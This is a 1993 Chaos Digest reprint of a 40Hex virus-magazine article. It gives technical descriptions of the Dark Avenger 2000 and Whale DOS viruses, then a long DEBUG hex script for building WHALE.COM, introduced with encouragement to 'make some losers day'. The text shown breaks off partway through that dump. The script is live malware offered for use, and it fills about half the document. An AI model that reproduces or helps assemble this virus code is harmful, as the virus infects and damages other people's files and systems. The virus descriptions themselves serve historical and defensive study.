home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / KAOS1_28.ZIP / KAOS1-28
Text File  |  1993-05-20  |  28KB  |  529 lines

  1. Chaos Digest           Mercredi 19 Mai 1993        Volume 1 : Numero 28
  2.                           ISSN  1244-4901
  3.  
  4.        Editeur: Jean-Bernard Condat (jbcondat@attmail.com)
  5.        Archiviste: Yves-Marie Crabbe
  6.        Co-Redacteurs: Arnaud Bigare, Stephane Briere
  7.  
  8. TABLE DES MATIERES, #1.28 (19 Mai 1993)
  9. File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)
  10.  
  11. Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
  12. available at no cost by sending a message to:
  13.                 linux-activists-request@niksula.hut.fi
  14. with a mail header or first line containing the following informations:
  15.                     X-Mn-Admin: join CHAOS_DIGEST
  16.  
  17. The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
  18. or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
  19. 155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
  20. groups.
  21.  
  22. Issues of ChaosD can also be found on some French BBS.  Back issues of
  23. ChaosD can be found on the Internet as part of the Computer underground
  24. Digest archives.  They're accessible using anonymous FTP from:
  25.  
  26.         * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
  27.         * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
  28.         * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
  29.         * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
  30.         * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
  31.         * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
  32.         * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos
  33.  
  34. CHAOS DIGEST is an open forum dedicated to sharing French information among
  35. computerists and to the presentation and debate of diverse views. ChaosD
  36. material may be reprinted for non-profit as long as the source is cited.
  37. Some authors do copyright their material, and they should be contacted for
  38. reprint permission.  Readers are encouraged to submit reasoned articles in
  39. French, English or German languages relating to computer culture and
  40. telecommunications.  Articles are preferred to short responses.  Please
  41. avoid quoting previous posts unless absolutely necessary.
  42.  
  43. DISCLAIMER: The views represented herein do not necessarily represent
  44.             the views of the moderators. Chaos Digest contributors
  45.             assume all responsibility for ensuring that articles
  46.             submitted do not violate copyright protections.
  47.  
  48. ----------------------------------------------------------------------
  49.  
  50. Date: Tue May 11 09:24:40 PDT 1993
  51. From: 0005847161@mcimail.com (American_Eagle_Publication_Inc. )
  52. Subject: File 1--40H VMag Issue 1 Volume 2 #005(2)-006(1) (reprint)
  53.  
  54.  
  55. Part III - DARK AVENGER 2000
  56. ----------------------------
  57.  
  58. Date:    02 Feb 90 10:49:00 +0700
  59. From:    Vesselin Bontchev
  60.  
  61. This virus is also "made in Bulgaria" and again I am indirectly the cause of
  62. its creation.  I am a well known "virus-buster" in Bulgaria and my antivirus
  63. programs are very widely used.  Of course, virus designers didn't like it.
  64. So their next creation...  causes trouble to my antivirus programs.
  65.  
  66. This virus is exactly 2000 bytes long and I think that it was created by the
  67. author of the Eddie (Dark Avenger) virus.  The programming style is the same
  68. and there are even pieces of code which are the same.
  69.  
  70. The virus acts much like the Eddie one --- it installs resident in memory by
  71. manipulating the memory control blocks; infects COMMAND.COM at the first run;
  72. infects both .COM- and .EXE-files; infects files when one executes them as
  73. well as when one copies them.
  74.  
  75. However, there are some extras added.  First, the virus is able to fetch the
  76. original INT 13h vector just like the V512 one (by using the same
  77. undocumented function --- tricks spread fast between virus programmers).
  78.  
  79. Second, it intercepts the find-first (FCB) and find-next (FCB) functions --
  80. just like V651 (aka EDDIE II) (and contains the same bugs), so you won't see
  81. the increased file lengths in the listing displayed by the DIR command.
  82.  
  83. Third, it contains the string "Copyright (C) 1989 by Vesselin Bontchev", so
  84. people may think that I am the author of this virus.  In fact, the virus
  85. searches every program being executed for this string (the case of the
  86. letters does not matter) and if found, hangs the system.  It is not necessary
  87. to tell you that all my antivirus programs contain this string.  Of course,
  88. now I will have to use some kind of encryption, just to prevent such tricks.
  89.  
  90. Vesselin Bontchev reported in May 1990:
  91.  
  92. The V2000 virus (DARK AVENGER 2000)
  93. ===================================
  94.  
  95. - It turned out that the example of this virus I sent to some of the
  96. antivirus researchers was not the original version.  The original contains
  97. the string "Only the Good die young..." instead of the "Copy me - I want to
  98. travel" message.  Also a small piece of code in the original version was
  99. patched to contain the "666" string. (That is, the version you have contains
  100. this string, the original does not.)
  101.  
  102. - There exists also a small mutation of the version you have.  The only
  103. difference is that the C' character in the word "Copy" was changed to Z'.
  104.  
  105. - When describing the V2000 virus, I stated that it halts the computer if you
  106. run a program which contains the string "Copyright (c) 1989 by Vesselin
  107. Bontchev". This is not quite correct. In fact, the programs are only checked
  108. for the "Vesselin Bontchev" part of the string.
  109.  
  110. - I obtained John McAfee's program Clean, version 60.  In the accompanying
  111. documentation he states about the V2000 virus that "The virus is very
  112. virulent and has caused system crashes and lost data, as well as causing some
  113. systems to become non-bootable after infection".  This is not very correct,
  114. or at least, there is much more to be said.  The virus is exactly as virulent
  115. as the Dark Avenger virus, and for the same reason.  It infects files not
  116. only when one executes them, but also when one reads or copies them. This is
  117. achieved exactly in the same manner as in the Dark Avenger.  The systems
  118. become non-bootable when the virus infects the two hidden files of the
  119. operating system - it cannot distinguish them from the regular .COM files.
  120. By the way, the Dark Avenger virus often causes the same effect.  And at
  121. last, but not least (:-)), the virus is highly destructive - just as the Dark
  122. Avenger is.  It destroys the information on a randomly selected sector on the
  123. disk once in every 16 runs of an infected program. The random function is
  124. exactly the same, and the counters (0 to 15 and for the last attacked sector)
  125. are exactly the same and on the same offsets in the boot sector as with the
  126. Dark Avenger virus.  The main difference is that the destroyed sector is
  127. overwritten not with a part of the virus body, but with the boot sector
  128. instead.  This makes a bit more difficult to discover which files are
  129. destroyed - the boot sector is contained in many "good" programs, such as
  130. FORMAT, SYS, NDD.  Also, the nastiest thing - the damage function is not
  131. performed via INT 26h (which can be intercepted).  The virus determines the
  132. address of the device driver for the respective disk unit (using an
  133. undocumented DOS function call, of course.  I begin to wonder if Ralf Brown
  134. did any good when he made the information in the INTERxyy file available :)).
  135. Then it performs a direct call to that address.  The device driver in DOS
  136. does its work and issues the appropriate INT 13h.  However the virus has
  137. scanned the controllers' ROM space and has determined the original address of
  138. the interrupt handler - just as the Dark Avenger virus does.  Then it has
  139. temporary replaced the INT 13h vector with the address of this handler.  The
  140. result is that the damage function cannot be intercepted.
  141.  
  142. - Also this virus (unlike Dark Avenger) supports PC-DOS version 4.0 and will
  143. work (and infect) under it.
  144.  
  145. - The bytes 84 A8 A0 AD A0 20 8F 2E in the virus body are the name "Diana
  146. P.", this time written in cyrillics.
  147.  
  148.                                                            Unknown Source
  149.  
  150. +++++
  151.  
  152. 40Hex Volume 1 Issue 2                                                  0006
  153.  
  154.                             The Whale Virus
  155.  
  156.      Oh yes here it is, the biggest and meanest virus around.  First
  157.      before you go and compile it read what Patti thinks of it.
  158.  
  159.  
  160. Aliases:     Mother Fish, Stealth Virus, Z The Whale
  161. V Status:    Research
  162. Discovered:  August, 1990
  163. Symptoms:    .COM & .EXE growth; decrease in available memory;
  164.              system slowdown; video flicker; slow screen writes;
  165.              file allocation errors; simulated system reboot
  166. Origin:      Hamburg, West Germany
  167. Eff Length:  9,216 Bytes
  168. Type Code:   PRhA - Parasitic Resident .COM & .EXE Infector
  169. Detection Method: ViruScan V67+, Pro-Scan 2.01+, NAV, IBM Scan 2.00+
  170. Removal Instructions:  Scan/D, CleanUp V67+, Pro-Scan 2.01+,
  171.              or Delete infected files
  172. General Comments:
  173.  
  174. The Whale Virus was submitted in early September, 1990.  This virus had been
  175. rumored to exist since the isolation of the Fish 6 Virus in June, 1990.  It
  176. has been referred to by several names besides Whale, including Mother Fish
  177. and Z The Whale.  The origin of this virus is subject to some speculation,
  178. though it is probably from Hamburg, West Germany due to a reference within
  179. the viral code once it is decrypted.
  180.  
  181. The first time a program infected with the Whale Virus is executed, the Whale
  182. will install itself memory resident in high system memory but below the 640K
  183. DOS boundary.  On the author's XT clone, the virus always starts at address
  184. 9D90.  Available free memory will be decreased by 9,984 bytes.  Most
  185. utilities which display memory usage will also indicate a value for total
  186. system memory which is 9,984 bytes less than what is actually installed.
  187.  
  188. The following text string can be found in memory on systems infected with the
  189. Whale virus:
  190.  
  191.                              "Z THE WHALE".
  192.  
  193. Immediately upon becoming memory resident, the system user will experience
  194. the system slowing down.  Noticeable effects of the system slowdown include
  195. video flicker to extremely slow screen writes.  Some programs may appear to
  196. "hang", though they will eventually execute properly in most cases since the
  197. "hang" is due to the slowing of the system.
  198.  
  199. When a program is executed with the Whale memory resident, the virus will
  200. infect the program.  Infected programs increase in length, the actual change
  201. in length is usually 9,216 bytes.  Note the "usually": this virus does
  202. occasionally infect a program with a "mutant" which will be a different
  203. length.  If the file length increase is exactly 9,216 bytes, the Whale will
  204. hide the change in file length when a disk directory command is executed.
  205. If the file length of the viral code added to the program is other than 9,216
  206. bytes, the file length displayed with the directory command will either the
  207. actual infected file length, or the actual infected file length minus 9,216
  208. bytes.
  209.  
  210. Executing the DOS CHKDSK program on infected systems will result in file
  211. allocation errors being reported.  If CHKDSK /F is executed, file damage
  212. will result.
  213.  
  214. The Whale also alters the program's date/time in the directory when the file
  215. is executed, though it is not set to the system date/time of infection.
  216. Occasionally, Whale will alter the directory entry for the program it is
  217. infecting improperly, resulting in the directory entry becoming invalid.
  218. These programs with invalid directory entries will appear when the directory
  219. is listed, but some disk utilities will not allow access to the program.
  220. In these cases, the directory entry can be fixed with Norton Utilities FD
  221. command to reset the file date.
  222.  
  223. The Whale occasionally will change its behavior while it is memory resident.
  224. While most of the time it only infects files when executed, there are periods
  225. of time when it will infect any file opened for any reason.  It will also, at
  226. times, disinfect files when they are copied with the DOS copy command, at
  227. other times it will not "disinfect on the fly".
  228.  
  229. Occasionally, the Whale Virus will simulate what appears to be a system
  230. reboot.  While this doesn't always occur, when it does occur the Break key
  231. is disabled so that the user cannot exit unexpectedly from the execution of
  232. the system's AutoExec.Bat file.  If the AutoExec.Bat file contained any
  233. software which does file opens of other executable programs, those opened
  234. executable programs will be infected at that time if they were not previously
  235. infected.  Typically, files infected in this manner will increase by 9,216
  236. bytes though it will not be shown in a directory listing.
  237.  
  238. A hidden file may be found in the root directory of drive C: on infected
  239. files.  This file is not always present, the virus will sometimes remove it,
  240. only to recreate it again at a later time.  The name of this hidden file is
  241. FISH-#9.TBL, it contains an image of the hard disk's partition table along
  242. with the following message:
  243.  
  244.         "Fish Virus #9
  245.          A Whale is no Fish!
  246.          Mind her Mutant Fish
  247.          and the hidden Fish Eggs
  248.          for they are damaging.
  249.          The sixth Fish mutates
  250.          only if the Whale is in
  251.          her Cave."
  252.  
  253. After the discovery of this hidden file, the author of this document made
  254. several attempt to have the Fish 6 Virus mutate by introducing it and Whale
  255. into a system.  Under no circumstances did a mutation of either virus result,
  256. the resultant files were infected with both an identifiable Fish 6 infection
  257. and a Whale infection.
  258.  
  259. Whale is hostile to debuggers and contains many traps to prevent successful
  260. decryption of the virus.  One of its "traps" is to lock out the keyboard if
  261. it determines a debugger is in use.
  262.  
  263.         Here's a side note by the author of F-Prot
  264.  
  265.  
  266.                              Whale
  267.  
  268. This is a recent, rather remarkable virus.  It is long, 9216 bytes and
  269. able to infect COM and EXE files.  The increase in file size is not
  270. visible though, while the virus is active in memory, as it uses several
  271. advanced "stealth" methods.  Other effects of the virus are not known,
  272. but one infected program displayed the following message when run:
  273.  
  274.              THE WHALE IN SEARCH OF THE 8 FISH
  275.              I AM 'knzyvo ' IN HAMBURG addr error D9EB,02
  276.  
  277. Most of the virus is devoted to encryption and code which moves blocks of
  278. virus code around.  This overhead results in a considerable slowdown of
  279. infected systems.
  280.  
  281.  
  282.      And here it is.  Use your editor to copy the below machine language
  283.      script to a file called WHALE.SCR  Next use DEBUG to make it into a
  284.      COM file.  Use the command  DEBUG < WHALE.SCR   When it gets done
  285.      you'll see a file called WHALE.COM.  There it is, have fun - and
  286.      make some losers day!
  287.  
  288. ---------------------------------------------------------------------------
  289.  
  290. n whale.com
  291. e 0100  E9 C9 23 01 F5 21 E1 02 C0 00 D2 07 FF FF 99 14
  292. e 0110  00 E9 B8 23 CD 20 8D 01 BD 00 E1 02 C0 00 D2 07
  293. e 0120  FF FF 99 14 FE FF E3 8F 01 00 99 14 1E 00 00 00
  294. e 0130  26 FB 5A 26 47 48 63 33 57 6E 52 4C 63 3D FF 10
  295. e 0140  D4 06 75 EC 06 7E 17 75 25 FA 03 24 3D 8B 21 90
  296. e 0150  C3 24 67 2A 08 12 07 C4 E0 5B 08 9C 06 E1 15 66
  297. e 0160  03 7B 25 7D D4 06 4E 36 9C 08 90 C3 24 D4 06 4C
  298. e 0170  36 FF 38 D4 06 4A 36 35 02 40 C7 20 7D 25 E5 13
  299. e 0180  C7 20 48 25 26 34 C3 77 3D 8B 29 3D 8B 38 48 81
  300. e 0190  E5 5C 01 BA 1D 53 AF CD CF CF 22 02 D9 A7 29 27
  301. e 01A0  4A 2E D9 14 2E 05 24 5F D5 B7 EB 38 1D 1F CE BF
  302. e 01B0  FF CC 4B BB 11 1B 81 11 06 EF A5 D0 02 A7 24 68
  303. e 01C0  63 AD 0A 07 0C E8 A2 14 E8 5E 1A 38 38 E5 68 30
  304. e 01D0  23 BD DB 29 AA 6A 23 92 26 48 3A F5 2C 38 B3 4A
  305. e 01E0  E0 16 AE 59 1C 03 01 88 2C F6 F5 0E 92 3E 22 3A
  306. e 01F0  B1 13 33 1C B7 D8 19 BD 1F FE 0B 4E 1C 0D F6 53
  307. e 0200  0E F6 BD 2D 27 CE 28 09 1C D3 5C BE DE C0 E7 83
  308. e 0210  5D 7A 67 A1 19 CD ED C2 4F 98 C3 2C 3E B6 4E 04
  309. e 0220  D8 FE E4 6A D5 F7 C2 15 C6 AD F7 2A 21 D5 8C C2
  310. e 0230  85 E2 6F ED F5 C2 5F CE A8 F7 28 B6 D3 28 29 D1
  311. e 0240  28 A0 F3 FB CE 9A 1E CE EA 08 14 69 29 5A D9 73
  312. e 0250  B4 0F 79 72 E5 7C D9 4C 54 D5 77 F9 79 47 BC 5A
  313. e 0260  19 5F B6 47 F6 52 1A 5F 72 AE 7C 2D 4C 09 7E 81
  314. e 0270  2F 7D 6E 21 72 AF 7C DB 4C 7A B4 65 5A 6F D0 E9
  315. e 0280  01 09 EA A7 FD 73 27 FA 8B 23 9A F3 CE FB B3 2E
  316. e 0290  3D C4 52 F8 2C C0 D4 48 21 F9 FD FC 90 E0 91 CB
  317. e 02A0  2C 69 C9 EA 6C C9 EB C6 F9 3B D4 FA E0 B8 67 D7
  318. e 02B0  0A 6E C6 D1 0C 4A 39 11 C2 97 D3 C6 0A 1D DB CD
  319. e 02C0  D0 E8 59 1B 39 5E 83 3E 5C 45 F4 50 25 5C B6 55
  320. e 02D0  7A 50 74 66 59 83 17 A1 AD 7E D2 4E 78 B6 CD 7F
  321. e 02E0  FF 2E 5C D0 AB 5E 9B 7D 72 5E E5 A0 5B 7B 78 70
  322. e 02F0  6A 7E 44 6B 56 DE 55 58 5E 6B 83 B6 E0 67 64 66
  323. e 0300  2D CE 2C 08 01 E3 DE 77 E7 F0 75 E3 F1 F8 42 F6
  324. e 0310  D6 40 F2 D7 CD 51 DE E3 53 D2 E2 DE 29 D5 B5 F2
  325. e 0320  D0 30 28 27 A0 F8 42 13 F2 0B AD C9 CB CB CE 01
  326. e 0330  08 31 25 18 11 23 24 10 0B 97 F3 01 18 9B 03 22
  327. e 0340  10 0B B8 06 37 36 F8 65 29 08 3D FF 08 0B 00 76
  328. e 0350  AB 00 26 9D D8 7E 98 1E E1 15 89 38 1F 00 AA 1D
  329. e 0360  0E 26 FB 55 15 C8 89 C3 9D DB A7 75 06 D9 ED A3
  330. e 0370  22 13 8C 28 1D 00 AF 25 0C 26 FB 5B 24 FA F2 28
  331. e 0380  AD BB 8D F8 EF 89 A8 EF 8D B8 BF 99 FC AB CD B8
  332. e 0390  AB 99 F8 EF CD B8 AB DD B8 EB 99 A8 BF 8D F8 2E
  333. e 03A0  A6 1C AB C4 EA E8 F6 0D 51 A0 99 62 44 F8 A7 C8
  334. e 03B0  B9 D9 54 71 95 A7 28 E3 AD EC 60 47 B0 E1 96 71
  335. e 03C0  95 B7 21 DA DF 71 32 CD 99 8A CE 6F CB 92 10 8B
  336. e 03D0  FE FA E8 26 13 5B A5 F8 72 75 9C 06 22 13 0E A9
  337. e 03E0  15 06 26 1D 58 2B 55 F3 76 8E D7 AC EB 01 ED FA
  338. e 03F0  BF 3A 98 07 AD 0B 33 E6 9D D8 CD FB 45 21 30 B8
  339. e 0400  CD 20 64 A8 20 E7 98 85 31 80 18 9C C5 FE 31 7B
  340. e 0410  43 8B 98 43 CD 9F 43 4E 9E 43 03 9E 43 A5 9F 43
  341. e 0420  DF 80 8F E8 3B 14 5A CB 16 FC CA D0 2A CD 66 C8
  342. e 0430  B0 FD 56 FE FD 54 C4 FE C3 F3 D9 99 FE 7D 2E C8
  343. e 0440  1C 1B 22 C8 ED C4 67 EB DA 0A E9 D9 0A E9 DF 1E
  344. e 0450  EB EA 34 EB E8 31 E5 EC 36 EB F6 68 E4 F5 1A E4
  345. e 0460  F4 A0 F3 89 5C F0 80 B3 E7 85 8E F2 84 8E F2 9C
  346. e 0470  F1 F0 88 D0 12 FC D0 62 CD 66 C8 23 C2 ED 23 F6
  347. e 0480  F3 90 3D FF 00 8B 25 70 FA 90 3B FA 65 3B 50 41
  348. e 0490  17 1C 39 29 64 E8 8D 15 1B 7A A7 B2 7A A7 33 7A
  349. e 04A0  A7 68 7A C6 B9 54 B0 6A C9 6B D3 3C 49 01 92 9A
  350. e 04B0  59 92 9A 41 66 DC D7 1A EC 75 CE 95 06 34 6D 50
  351. e 04C0  D7 6B 94 7C 6A 61 07 33 24 01 36 26 C5 85 C7 45
  352. e 04D0  7E 2E D9 35 EA 02 E5 E8 4F 15 28 44 5F EB 62 26
  353. e 04E0  47 6A FD 74 1D 54 6C 53 5F E9 62 2A 47 6A 99 AB
  354. e 04F0  BB 5F EC 52 28 47 6A F8 44 1F 54 4C CF 57 35 61
  355. e 0500  99 E4 59 58 C3 98 BC 34 28 48 53 7C 41 8F 20 FB
  356. e 0510  31 20 0F 26 BE 7E 02 2E F1 18 35 11 28 1F C9 9F
  357. e 0520  05 35 8A 26 B3 23 88 71 D9 47 D7 D0 E8 6F 3B 1D
  358. e 0530  D0 33 E7 50 26 2F 14 E2 DE 98 D9 CE FB 04 20 01
  359. e 0540  45 4D D9 43 89 72 D9 33 05 14 31 00 12 7D 50 AD
  360. e 0550  54 4B 56 08 EC 26 CC 37 E8 CE 16 0E B2 37 95 BC
  361. e 0560  98 2E 74 A6 7C B7 87 7C AD 9A 9B E5 FB D4 23 0A
  362. e 0570  58 78 18 6B A5 C5 9B F4 93 89 9D 9A BB 58 C2 4F
  363. e 0580  58 C7 07 7C 10 5F 96 4B 45 64 D0 E8 93 16 28 97
  364. e 0590  8C 38 B1 F5 94 B9 2E A7 CE 87 BF 80 8C 3A B1 F9
  365. e 05A0  94 B9 4A 26 68 8C 3F 81 FB 94 B9 2B 97 CC 87 9F
  366. e 05B0  1C 84 E6 B2 4A 63 8B 8B C3 CE 94 05 3F 73 7E 10
  367. e 05C0  40 96 C8 AD 52 A2 F8 90 97 95 B1 A0 F8 7C C8 37
  368. e 05D0  62 18 6C 88 F5 6F 7A E5 4B 83 60 1B 07 A1 4D 08
  369. e 05E0  AF C9 87 78 11 81 C8 6B 04 AF E0 81 E5 FC 04 7B
  370. e 05F0  3D FF 92 62 09 7E 26 0C 24 3D 88 21 16 0C 24 DF
  371. e 0600  E9 7B 13 EB CE 2F 05 28 27 DC BC D9 1A ED 31 52
  372. e 0610  37 2D F4 FA 54 28 1D 67 03 CF 6A FE CE 37 05 06
  373. e 0620  34 CF 19 CB CF 05 31 97 01 B4 18 FE 41 21 8B 73
  374. e 0630  21 82 F7 20 2F 14 21 F1 10 D1 46 2C A7 E9 7D 3B
  375. e 0640  20 66 03 CF 4E 01 A6 7C 18 A6 92 7F 3B 13 24 55
  376. e 0650  10 E9 69 12 81 49 0E 00 02 90 5F 39 13 E9 65 12
  377. e 0660  E2 22 FA EC 22 F8 43 CF 2B 02 CE C5 04 2D 4B B0
  378. e 0670  B4 B5 BC 3E 77 18 96 5B 44 72 61 03 CF 33 01 CE
  379. e 0680  D2 04 06 67 C0 50 D7 75 5C 3C F4 BD 77 FA 91 DC
  380. e 0690  74 52 D2 74 E3 66 C2 52 D5 F4 CE 49 8B 4C 4A 50
  381. e 06A0  BA 81 6F 73 60 03 CF E5 00 CE 84 04 D7 00 1D 2A
  382. e 06B0  B4 48 8C 02 13 8F CB 16 1B FF 05 53 25 60 36 E9
  383. e 06C0  CA 35 06 0C BE D8 A7 75 B9 13 37 BA 13 35 2E EC
  384. e 06D0  23 66 36 47 03 FA 98 00 FA F5 00 50 0F 5C 55 7C
  385. e 06E0  53 5B 18 23 2A 1B 54 51 79 00 55 7C 53 5B 15 56
  386. e 06F0  5A 67 55 40 15 23 2A 15 20 52 15 57 7B 54 6C 76
  387. e 0700  15 69 60 15 6E 7C 15 46 7A 46 68 32 15 4D 7A 5B
  388. e 0710  64 33 5D 65 61 15 4D 66 41 61 7D 41 20 55 5C 73
  389. e 0720  7B 15 61 7D 51 20 67 5D 65 33 5D 69 77 51 65 7D
  390. e 0730  15 46 7A 46 68 33 70 67 74 46 20 75 5A 72 33 41
  391. e 0740  68 76 4C 20 72 47 65 33 51 61 7E 54 67 7A 5B 67
  392. e 0750  3D 15 54 7B 50 20 60 5C 78 67 5D 20 55 5C 73 7B
  393. e 0760  15 6D 66 41 61 67 50 73 33 5A 6E 7F 4C 20 7A 53
  394. e 0770  20 44 5D 61 7F 50 20 7A 46 20 7A 5B 20 7B 50 72
  395. e 0780  33 76 61 65 50 0E 0C 81 40 AA AE 00 A9 EF 05 EC
  396. e 0790  23 66 36 47 06 A7 0B FF 05 53 25 FB DE 1A E1 CE
  397. e 07A0  0B FD E5 FB 14 DB FA EC DA FB 97 25 02 0C C2 16
  398. e 07B0  F1 04 E0 1A 4C 3A E4 A9 E2 06 EA F7 C7 30 0D 75
  399. e 07C0  C4 9A D3 D0 54 17 A6 67 DA A6 7C 17 A6 92 6F 36
  400. e 07D0  13 24 A6 4C 12 26 F8 CB C5 3D E8 40 10 0C D2 6E
  401. e 07E0  27 59 90 D5 D9 90 D7 3A 78 EE DF 66 1B CD 07 E8
  402. e 07F0  CE 43 03 2A CA 50 2C 41 9E F3 C0 9E DF 22 50 E5
  403. e 0800  C7 75 23 FB 74 2C 60 4D CF 93 FC CF 50 03 AF 45
  404. e 0810  02 AF 5D 04 CD F7 21 2A 11 E6 07 20 DB 75 AE 20
  405. e 0820  26 0C 89 CF FB 00 26 48 53 7C 1D 58 23 03 00 27
  406. e 0830  D0 33 F5 92 EE AE E8 E8 BE E8 E9 E0 16 EB CF B1
  407. e 0840  06 A1 C0 89 38 17 00 2D DA 74 E6 5A E9 75 13 B9
  408. e 0850  3A 13 53 71 FB E8 CD 11 1E 50 8D 2B AC 8D AA AC
  409. e 0860  4B 89 46 03 53 D9 2B 8E D9 23 8A 4E 37 9E EB 67
  410. e 0870  F5 2F 71 77 B8 77 6C 4F 67 7C CE D5 02 3E A5 3D
  411. e 0880  97 A6 F1 92 F6 3D CF A1 37 63 ED E5 11 56 FF D6
  412. e 0890  A4 6E CB 4D 45 89 BC 74 7B 90 C4 22 FA 04 D9 01
  413. e 08A0  EB B7 9A 16 22 13 8B 38 1F 00 C2 12 0B EF 67 10
  414. e 08B0  1E CA 72 2A 94 DA AF 05 04 26 22 C2 C4 F1 74 2D
  415. e 08C0  92 C6 5E 17 E8 2D E8 E9 8E 1A EA CF 90 02 08 D5
  416. e 08D0  84 6F 19 E8 2D DA 74 D5 9A 1E 2A 13 33 F5 9A 16
  417. e 08E0  22 13 31 F6 B0 0C 26 FA 16 DB 92 C6 B6 27 B9 3A
  418. e 08F0  13 F3 82 20 C9 CE FB 4A 24 5A F8 84 F4 71 08 E5
  419. e 0900  FF 67 CE F8 61 5E DC 2D 4F 47 6B CF F6 C1 60 AD
  420. e 0910  CC 60 BD CE EE F7 FA 68 2A DE CE 08 21 62 AD CC
  421. e 0920  62 BD CE C6 04 FD 68 22 DE 62 AD FD 62 BD FF 52
  422. e 0930  E4 DE 2C BD D0 EA F8 6A CC 71 24 C5 07 C8 8D DD
  423. e 0940  36 AD E1 94 FA 5C D8 28 DE 52 C6 C3 75 90 C6 33
  424. e 0950  A8 7D 33 FB F1 D9 90 C6 24 A8 8B 53 FB E8 D9 90
  425. e 0960  C6 24 A8 81 26 FB DF D9 90 C6 2E A8 08 2C FB D6
  426. e 0970  D9 90 C6 24 A8 2F 16 FB CD D9 90 C6 24 A8 A5 24
  427. e 0980  FB C4 D9 90 C6 78 A8 7D 33 FB BB D9 90 C6 23 A8
  428. e 0990  9F 86 FB B2 D9 90 C6 2C A8 A7 26 FB A9 D9 90 C6
  429. e 09A0  2A A8 2D A1 FB A0 D9 90 C6 24 A8 29 5E FB 97 D9
  430. e 09B0  90 C6 24 A8 29 64 FB 8E D9 90 C6 24 A8 C0 3C FB
  431. e 09C0  85 D9 90 C6 4A A8 14 37 FB 7C D9 90 C6 29 A8 00
  432. e 09D0  26 FB 73 D9 90 C6 2D A8 E3 24 FB 6A D9 48 C3 CE
  433. e 09E0  72 01 0A BA A7 88 05 1C AB 03 8C 8F 33 7F 7C 1E
  434. e 09F0  B7 DD B4 B6 3B B5 13 3A 9E 87 70 AC CF AA 0E B9
  435. e 0A00  A1 45 BF E9 9F 5F 89 76 8D 0F E4 B6 67 C0 B1 A2
  436. e 0A10  67 70 08 D7 1E E3 37 E8 0F 12 27 26 9F C0 A7 F8
  437. e 0A20  00 02 0E 00 26 20 D2 08 98 0E E5 37 49 27 D8 15
  438. e 0A30  26 13 41 D1 E2 89 62 30 92 B5 E4 F1 AF 57 21 CE
  439. e 0A40  54 18 0E FA 5D DB FB FA 26 26 52 9C AF A8 90 60
  440. e 0A50  5E 76 A7 73 C4 43 BA 14 BA DE BC CD 93 4F 80 26
  441. e 0A60  6C 6F DE 72 D5 77 5A C8 4C E6 64 5C 6B A9 52 74
  442. e 0A70  1B D1 B6 50 E2 76 A9 A1 8E A9 6C 8E A9 58 6C 77
  443. e 0A80  C3 E9 FA 06 DC FB E8 9C 13 1A B6 6B 3E 4C 67 B1
  444. e 0A90  92 7E 76 97 AD 55 A0 11 B5 06 81 78 78 79 78 AF
  445. e 0AA0  79 78 53 94 8B E5 FB 80 2E FB 17 2E 61 43 08 93
  446. e 0AB0  3E 84 37 00 52 28 E8 DE 02 83 DD EC 74 15 FB 82
  447. e 0AC0  26 37 84 8C 69 8A 00 B3 8A A5 2E 90 A2 28 D6 86
  448. e 0AD0  A4 44 50 38 AA 03 34 A0 84 1E C1 5C B1 0D FF B1
  449. e 0AE0  0D FC 6B 6C 01 80 A1 08 93 26 95 37 FE CF A0 FC
  450. e 0AF0  CE FA 97 DF FB 4C 26 00 D5 FD C1 3D D8 CE 6C E7
  451. e 0B00  C6 FB 52 65 F1 4C 94 F1 1B B8 C2 E7 E1 AF 53 04
  452. e 0B10  26 1D 4E 26 53 E5 26 E1 56 FE 26 13 E8 05 17 2E
  453. e 0B20  D8 15 A2 02 F8 C1 9D FA 61 DF 2E E8 33 13 0F 7E
  454. e 0B30  FF 77 78 65 A7 68 2D 7D 78 54 5F 96 00 4F 6E D0
  455. e 0B40  E9 34 10 3D F3 05 74 DE 3E EF 34 5D FE E1 FA 99
  456. e 0B50  DB 98 D5 AF F6 BB 75 D0 53 EA AD 01 9D 19 C0 52
  457. e 0B60  10 E9 BE 11 E8 FA EC 4D 74 5F 00 5A CD 54 52 65
  458. e 0B70  7C FD 5F 76 50 6F 97 42 65 76 CD 4F 52 CB B0 76
  459. e 0B80  7A 46 A1 D0 1F 4D CD 11 52 CB 46 77 87 E5 E9 8B
  460. e 0B90  BE BA 52 B8 0F 5A CE 54 92 65 7C FB 47 BA 50 6F
  461. e 0BA0  DD 72 F2 76 7A F9 53 3F 46 CE CF B0 76 5A BE 4C
  462. e 0BB0  41 65 BA A0 57 1C 55 31 2E A5 1D B3 02 12 2E D9
  463. e 0BC0  25 B3 02 3D FF 10 FB 24 08 EC 36 C0 37 55 08 D7
  464. e 0BD0  1E 02 37 89 C3 FA BD DE 9A 04 CE 75 FF 02 29 D2
  465. e 0BE0  5B 2E 34 1B 90 2E 1C 96 68 38 07 9B BF 0D C8 B3
  466. e 0BF0  5C 37 3A EE 7F E2 29 3A 32 D7 3C BE 0D D1 F7 C1
  467. e 0C00  BD 0A 0C 2E E3 25 03 03 90 FE 27 66 40 CE 20 FF
  468. e 0C10  11 01 99 22 1B 12 B7 C3 02 80 50 3C CB 17 74 11
  469. e 0C20  02 C1 1A 88 04 31 24 ED 02 19 12 1A 8E 14 37 24
  470. e 0C30  11 2A 13 12 B7 C2 02 1A 88 0C 35 24 ED 02 15 12
  471. e 0C40  1A 8E 14 CB 25 FA 75 17 2A CF 00 01 2F FA D8 26
  472. e 0C50  FB F0 D8 D7 30 FE C7 C8 FF 24 30 38 11 37 55 C1
  473. e 0C60  CA D5 11 F0 AD 02 30 AF 59 30 FE CD CF AD 50 31
  474. e 0C70  AF 29 30 FE C6 CF AD 70 32 AF 3F 30 FE FF CF AD
  475. e 0C80  73 35 AF 29 30 FE F0 CF AD 26 37 AF 63 30 FE E9
